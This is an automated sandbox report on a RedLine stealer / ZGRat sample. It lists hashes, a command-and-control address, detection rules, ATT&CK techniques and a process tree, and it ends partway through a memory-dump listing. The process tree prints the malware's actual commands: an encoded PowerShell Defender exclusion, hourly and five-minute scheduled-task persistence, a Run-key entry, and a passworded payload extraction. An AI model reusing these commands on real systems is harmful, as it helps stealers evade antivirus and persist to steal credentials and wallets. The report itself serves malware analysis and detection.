redline | 34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14

Analysis

max time kernel
96s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
20/02/2024, 05:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
Size

265KB
MD5

4fe5662cb2c58cce7ee28591abd209a6
SHA1

21e7ef14089a482e2774a1226d7833eb0d117401
SHA256

34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14
SHA512

b5fd13262434fdd1049395898ffc1223264c86573fe89c320b9dc2d0db792f1d2cab06253b1b8b803c565bc1f4275fed20fe3b2685c4b079fe17a60d70a5f173
SSDEEP

3072:JnP9/O4ylCyd9CJy4pBVCovMD8hVXjVMjMbMmSKAhH:An9C9v0oED8bh/bM1DhH

Score

10^/10

redline zgrat @hersgorid discovery infostealer persistence rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

@hersgorid

45.15.156.167:80

Signatures

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral2/files/0x00060000000231f5-71.dat	family_zgrat_v1
behavioral2/files/0x00060000000231f5-76.dat	family_zgrat_v1
behavioral2/files/0x00060000000231f5-77.dat	family_zgrat_v1
behavioral2/memory/2176-78-0x0000000000C20000-0x00000000012A8000-memory.dmp	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/memory/732-0-0x00000000001C0000-0x00000000001FE000-memory.dmp	family_redline
behavioral2/memory/732-3-0x0000000000400000-0x0000000000447000-memory.dmp	family_redline

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Detects executables (downlaoders) containing URLs to raw contents of a paste 2 IoCs

resource	yara_rule
behavioral2/memory/1036-129-0x00000000007A0000-0x00000000007AC000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral2/memory/1036-135-0x0000000004EB0000-0x0000000004EC0000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL

Detects executables packed with ConfuserEx Mod 2 IoCs

resource	yara_rule
behavioral2/memory/732-0-0x00000000001C0000-0x00000000001FE000-memory.dmp	INDICATOR_EXE_Packed_ConfuserEx
behavioral2/memory/732-3-0x0000000000400000-0x0000000000447000-memory.dmp	INDICATOR_EXE_Packed_ConfuserEx

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	conhost.exe

Executes dropped EXE 6 IoCs

pid	Process
2364	conhost.exe
3652	7z.exe
1120	7z.exe
3472	7z.exe
1348	Installer.exe
2176	svchost.exe

Loads dropped DLL 4 IoCs

pid	Process
3652	7z.exe
1120	7z.exe
3472	7z.exe
2176	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kwweifjdskdv = "C:\\Users\\Admin\\AppData\\Local\\kwweifjdskdv\\kwweifjdskdv.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
52	pastebin.com
53	pastebin.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2176 set thread context of 4652	2176	svchost.exe	104
PID 1348 set thread context of 1036	1348	Installer.exe	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4360	4652	WerFault.exe	104

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4680	schtasks.exe
3032	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
3624	powershell.exe
1036	RegSvcs.exe
3624	powershell.exe
4688	powershell.exe
4688	powershell.exe
1036	RegSvcs.exe
1036	RegSvcs.exe
1036	RegSvcs.exe
1036	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
Token: SeRestorePrivilege	3652	7z.exe
Token: 35	3652	7z.exe
Token: SeSecurityPrivilege	3652	7z.exe
Token: SeSecurityPrivilege	3652	7z.exe
Token: SeRestorePrivilege	1120	7z.exe
Token: 35	1120	7z.exe
Token: SeSecurityPrivilege	1120	7z.exe
Token: SeSecurityPrivilege	1120	7z.exe
Token: SeRestorePrivilege	3472	7z.exe
Token: 35	3472	7z.exe
Token: SeSecurityPrivilege	3472	7z.exe
Token: SeSecurityPrivilege	3472	7z.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	1036	RegSvcs.exe
Token: SeDebugPrivilege	4688	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 732 wrote to memory of 2364	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe	92
PID 732 wrote to memory of 2364	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe	92
PID 732 wrote to memory of 2364	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe	92
PID 2364 wrote to memory of 2832	2364	conhost.exe	93
PID 2364 wrote to memory of 2832	2364	conhost.exe	93
PID 2832 wrote to memory of 4080	2832	cmd.exe	95
PID 2832 wrote to memory of 4080	2832	cmd.exe	95
PID 2832 wrote to memory of 3652	2832	cmd.exe	96
PID 2832 wrote to memory of 3652	2832	cmd.exe	96
PID 2832 wrote to memory of 1120	2832	cmd.exe	97
PID 2832 wrote to memory of 1120	2832	cmd.exe	97
PID 2832 wrote to memory of 3472	2832	cmd.exe	98
PID 2832 wrote to memory of 3472	2832	cmd.exe	98
PID 2832 wrote to memory of 2032	2832	cmd.exe	99
PID 2832 wrote to memory of 2032	2832	cmd.exe	99
PID 2832 wrote to memory of 1348	2832	cmd.exe	100
PID 2832 wrote to memory of 1348	2832	cmd.exe	100
PID 2832 wrote to memory of 1348	2832	cmd.exe	100
PID 732 wrote to memory of 2176	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe	101
PID 732 wrote to memory of 2176	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe	101
PID 732 wrote to memory of 2176	732	34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe	101
PID 2176 wrote to memory of 2648	2176	svchost.exe	103
PID 2176 wrote to memory of 2648	2176	svchost.exe	103
PID 2176 wrote to memory of 2648	2176	svchost.exe	103
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 2176 wrote to memory of 4652	2176	svchost.exe	104
PID 1348 wrote to memory of 1036	1348	Installer.exe	108
PID 1348 wrote to memory of 1036	1348	Installer.exe	108
PID 1348 wrote to memory of 1036	1348	Installer.exe	108
PID 1348 wrote to memory of 1036	1348	Installer.exe	108
PID 1348 wrote to memory of 1036	1348	Installer.exe	108
PID 2176 wrote to memory of 3624	2176	svchost.exe	109
PID 2176 wrote to memory of 3624	2176	svchost.exe	109
PID 2176 wrote to memory of 3624	2176	svchost.exe	109
PID 1036 wrote to memory of 776	1036	RegSvcs.exe	111
PID 1036 wrote to memory of 776	1036	RegSvcs.exe	111
PID 1036 wrote to memory of 776	1036	RegSvcs.exe	111
PID 776 wrote to memory of 4688	776	cmd.exe	113
PID 776 wrote to memory of 4688	776	cmd.exe	113
PID 776 wrote to memory of 4688	776	cmd.exe	113
PID 1036 wrote to memory of 1080	1036	RegSvcs.exe	115
PID 1036 wrote to memory of 1080	1036	RegSvcs.exe	115
PID 1036 wrote to memory of 1080	1036	RegSvcs.exe	115
PID 1036 wrote to memory of 2944	1036	RegSvcs.exe	114
PID 1036 wrote to memory of 2944	1036	RegSvcs.exe	114
PID 1036 wrote to memory of 2944	1036	RegSvcs.exe	114
PID 1080 wrote to memory of 4680	1080	cmd.exe	118
PID 1080 wrote to memory of 4680	1080	cmd.exe	118
PID 1080 wrote to memory of 4680	1080	cmd.exe	118
PID 2944 wrote to memory of 3032	2944	cmd.exe	119
PID 2944 wrote to memory of 3032	2944	cmd.exe	119
PID 2944 wrote to memory of 3032	2944	cmd.exe	119

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe
"C:\Users\Admin\AppData\Local\Temp\34689b020d52447635900d49e7deb33016418c9eef25b1e1e82ec0756456ac14.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732
- C:\Users\Admin\AppData\Local\Temp\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:4080
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p146312891125116171371883110193 -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:3472
  - - C:\Windows\system32\attrib.exe
      attrib +H "Installer.exe"
      4⤵
      Views/modifies file attributes
      PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
      "Installer.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1348
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1036
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powershell -EncodedCommand "PAAjAEwAcABLAHAAYgBLAHQANwBpAE4ASAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAYwBvAE4AOQA5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAUwB4AGIAYgBxAE8AVQBiAGkAUwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AGEATwBxAHMAMQBiADAAYgBwAFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAEwAcABLAHAAYgBLAHQANwBpAE4ASAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAYwBvAE4AOQA5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAUwB4AGIAYgBxAE8AVQBiAGkAUwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AGEATwBxAHMAMQBiADAAYgBwAFYAIwA+AA=="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4688
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5162" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2944
        
        C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5162" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:3032
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1080
        
        C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:4680
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:2648
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:4652
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 808
      4⤵
      Program crash
      PID:4360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv' -Value '"C:\Users\Admin\AppData\Local\kwweifjdskdv\kwweifjdskdv.exe"' -PropertyType 'String'
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4652 -ip 4652
1⤵
PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
fb1df442f2cee34456c6ed9064318559

SHA1
729e8f61f181b303d25e1f709399db242d82c6c2

SHA256
75207b26127c0778928b2c0ce51d371a1b4f5a4c47596902f88dbff9ddd16a79

SHA512
d6df1b8e17733d65ae332d20a22fcbc2cdec8df38a705b694b4d87b2f0c9c287378791c3da2cb2142e95f31df1b4209e01a17a83eabfcb2175f38a9207ad0294

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9b80a1bfb519536b269acb0c2cf252a5

SHA1
b74508b2b7aba715835182f6531ceb172199c795

SHA256
4b1dbe84c4582ab9f711c309a8db391334df90aeacd8254689ccd575260db286

SHA512
5da8ea4eef6fb8aa0c0ecb71688e1ad827e70e21916ba03c7d3dac23738f06c866ca25d7ae3a0e523d305a61806b1e4d3e28f40df88f1e2519aa9e375b3f401d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

Filesize
742KB

MD5
544cd51a596619b78e9b54b70088307d

SHA1
4769ddd2dbc1dc44b758964ed0bd231b85880b65

SHA256
dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

SHA512
f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpq5xvgc.qxm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\conhost.exe

Filesize
2.9MB

MD5
8340b7602e82921aa8d72ae4f8ea11cc

SHA1
a49524d26639130bc09acb4a0187917fbc5ec003

SHA256
efee38133480e7ccaa11424d49bb3d8ebdb89ffb1d81a10f6c405337e7d3a737

SHA512
eab92e881f24d6fdcb061540c3ee96f4d4fa9e26a7ef1ea82743ebca3e64821f94467cc65a2c3e83ee4c9091cc4e714e938b9f583c3dc9f88938555322e04f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.2MB

MD5
b5e813efd092c823e641722e0e721cf2

SHA1
e381b6fc4a362091a4b09e6e366d15efdb6820d3

SHA256
fe75fd8c297d1d223ba238caa95e2d3bd9436538d125c8b87f62a297aeb11b42

SHA512
be677d3811cd2a3f6b187ac53e7086307776abc9fef39165c4b0a54aceaa332a88da84e4ce4234a653c12a2a57dabd77ddf74b40ae9e709436b8ac6ef7d96283

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
610KB

MD5
6141fcd89a442521fabada983b07696a

SHA1
c884d75aa3df2ab52ad128146e45825466db257e

SHA256
5a4414a62987d89c24f62ba447cb25b3310a4e543dcb505a807e62a77d8d1426

SHA512
5f482678d7c71127d67f9b52d3e4c4e99111a4a2bbcbf36e299f57c6fffb354a490d573ee565b99483ac9b3ff015fc9337dffdb5d739a94d1994662a5dde0107

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
499KB

MD5
ca8acb796044d922702f2fedd039c718

SHA1
45b997cc60b4875eec3f462006f1605dcb16c984

SHA256
710634857b5c70a6b6f014da45b0e1705a180aca3f2c1d53c39aa179d2451671

SHA512
591c1da7c720500440aa47bc52423457d0963eca381451a6163a144c0168ed863b45872020a2a6fa645b97db397e93060265f7c150616a039c2aed25cd0607da

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
2.1MB

MD5
7f93db1b1ba5dd798ee0fb7ac1ee5b5a

SHA1
b68db4bdb7ad77c720a1861ec9158b49b99c3473

SHA256
50806e50951c2ab080a1ad10873349940355d49cbecf564bdc4d3ca65516dff2

SHA512
41e7df8738ef3f549d20c3943d0a4b2aa34e91675604d0bec62fa6633d7fb262a38adcde70b8c08639cbf9d62cf043b4220b8fc20483f061687815da22faef5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
2.1MB

MD5
fc7c63ffa72326c3641efbdf507ab046

SHA1
a65964ee890eabc1e09d16ad4a36fa0530290435

SHA256
3bac3a7196c4e1f347bbfc4bb7319c14a60155edadb246cc41f3a251b76f3bf6

SHA512
39168751411ceff6b44013bb3eb2ca4a59c6b11f119d3fac72fcf85d401113170dd056d8dcdce29f0f60b38feedc0cb4bc72461ed32c17d6a616c446eacd62e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
476B

MD5
4edd28bf306d37273a4b30ef3f75d92f

SHA1
db8fbd39931f0faaa160c700435279210bf97cc3

SHA256
e49d849e2a89613a493a07ee4f15f56cde89073e1dc527a4881846dd03eaa130

SHA512
b05fb8ff44ce032d09f096de855d99d64f64c03dead392863aa186edd05809fc99825862432dc7b826447b5880fe7b1eeb6135502df35d0227c16691665530df

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.7MB

MD5
67cce9bd8e377ff066103e953363f386

SHA1
4c1db750780a11a90b553d7a0413c8c834b2d5a0

SHA256
583bf64699eae99864b4574b2551074159c9b475eb73d4c19d806adf17bcb199

SHA512
318014aa045a4576e4a67c603ebe5c799ca508322b3549030ec3b19261d1e6e2d549c55bf756ba7a73b82e4b761b2c9cb4672dbc7e1b22a7ea17d9330ace936b

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.1MB

MD5
fb8a1065252788bd453651587700c847

SHA1
b39563f089bf809b029c354fb7946e12553a2013

SHA256
094f4f5f4f3830b8317a48fc9b875beb05bc60de3ae665413f59060759530676

SHA512
5646d3faa432045644116224869dbca6e25ec239a84dad82f49866fa6ce4a00e49711050c92972b9fa6088159bd7c24a873b7c590cecfabfb727cbde54066109

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.5MB

MD5
432015416a8f387f3731cebe00821f90

SHA1
6a7dc15d5419a8b80460f1d5f1283eb0a52a5699

SHA256
258ef9f20b1241abb053ca2b9d7c00aa6b11537f36d0ed43ec012a71ae717e36

SHA512
f392de0de558107b206ed2a1656541fb4d11303ea88257102ba1b4d605407a8d312100152502571f9c6a0db1c4ededd7f55eb281cef3b0f65491ab5e3d8d6f88

Download Submit
memory/732-14-0x0000000009FB0000-0x0000000009FFC000-memory.dmp

Filesize
304KB

Download
memory/732-8-0x00000000077C0000-0x00000000077D0000-memory.dmp

Filesize
64KB

Download
memory/732-17-0x000000000B710000-0x000000000BC3C000-memory.dmp

Filesize
5.2MB

Download
memory/732-16-0x000000000B540000-0x000000000B702000-memory.dmp

Filesize
1.8MB

Download
memory/732-15-0x000000000B0F0000-0x000000000B156000-memory.dmp

Filesize
408KB

Download
memory/732-7-0x00000000075F0000-0x0000000007682000-memory.dmp

Filesize
584KB

Download
memory/732-13-0x0000000009F50000-0x0000000009F8C000-memory.dmp

Filesize
240KB

Download
memory/732-12-0x0000000009F30000-0x0000000009F42000-memory.dmp

Filesize
72KB

Download
memory/732-11-0x0000000009E20000-0x0000000009F2A000-memory.dmp

Filesize
1.0MB

Download
memory/732-10-0x00000000085A0000-0x0000000008BB8000-memory.dmp

Filesize
6.1MB

Download
memory/732-9-0x00000000077F0000-0x00000000077FA000-memory.dmp

Filesize
40KB

Download
memory/732-6-0x0000000007000000-0x00000000075A4000-memory.dmp

Filesize
5.6MB

Download
memory/732-79-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/732-5-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/732-0-0x00000000001C0000-0x00000000001FE000-memory.dmp

Filesize
248KB

Download
memory/732-18-0x0000000005DE0000-0x0000000005E30000-memory.dmp

Filesize
320KB

Download
memory/732-86-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/732-3-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/1036-135-0x0000000004EB0000-0x0000000004EC0000-memory.dmp

Filesize
64KB

Download
memory/1036-134-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/1036-129-0x00000000007A0000-0x00000000007AC000-memory.dmp

Filesize
48KB

Download
memory/1348-128-0x00000000006C0000-0x00000000007C0000-memory.dmp

Filesize
1024KB

Download
memory/2176-81-0x00000000062A0000-0x000000000633C000-memory.dmp

Filesize
624KB

Download
memory/2176-94-0x00000000025A0000-0x00000000025B0000-memory.dmp

Filesize
64KB

Download
memory/2176-88-0x0000000006F00000-0x0000000007092000-memory.dmp

Filesize
1.6MB

Download
memory/2176-87-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/2176-85-0x0000000006800000-0x0000000006A56000-memory.dmp

Filesize
2.3MB

Download
memory/2176-139-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/2176-82-0x0000000006340000-0x0000000006694000-memory.dmp

Filesize
3.3MB

Download
memory/2176-78-0x0000000000C20000-0x00000000012A8000-memory.dmp

Filesize
6.5MB

Download
memory/2176-80-0x00000000750D0000-0x0000000075880000-memory.dmp

Filesize
7.7MB

Download
memory/3624-157-0x0000000006870000-0x00000000068BC000-memory.dmp

Filesize
304KB

Download
memory/3624-170-0x0000000006E10000-0x0000000006E42000-memory.dmp

Filesize
200KB

Download
memory/3624-200-0x0000000007BE0000-0x0000000007BEA000-memory.dmp

Filesize
40KB

Download
memory/3624-197-0x00000000081B0000-0x000000000882A000-memory.dmp

Filesize
6.5MB

Download
memory/3624-201-0x0000000007DE0000-0x0000000007E76000-memory.dmp

Filesize
600KB

Download
memory/3624-207-0x0000000007DA0000-0x0000000007DB4000-memory.dmp

Filesize
80KB

Download
memory/3624-209-0x0000000007E80000-0x0000000007E88000-memory.dmp

Filesize
32KB

Download
memory/3624-183-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

Filesize
64KB

Download
memory/3624-184-0x0000000007A30000-0x0000000007AD3000-memory.dmp

Filesize
652KB

Download
memory/3624-182-0x0000000006E50000-0x0000000006E6E000-memory.dmp

Filesize
120KB

Download
memory/3624-199-0x0000000007B60000-0x0000000007B7A000-memory.dmp

Filesize
104KB

Download
memory/3624-154-0x00000000062B0000-0x0000000006316000-memory.dmp

Filesize
408KB

Download
memory/3624-172-0x0000000071820000-0x000000007186C000-memory.dmp

Filesize
304KB

Download
memory/3624-171-0x000000007F690000-0x000000007F6A0000-memory.dmp

Filesize
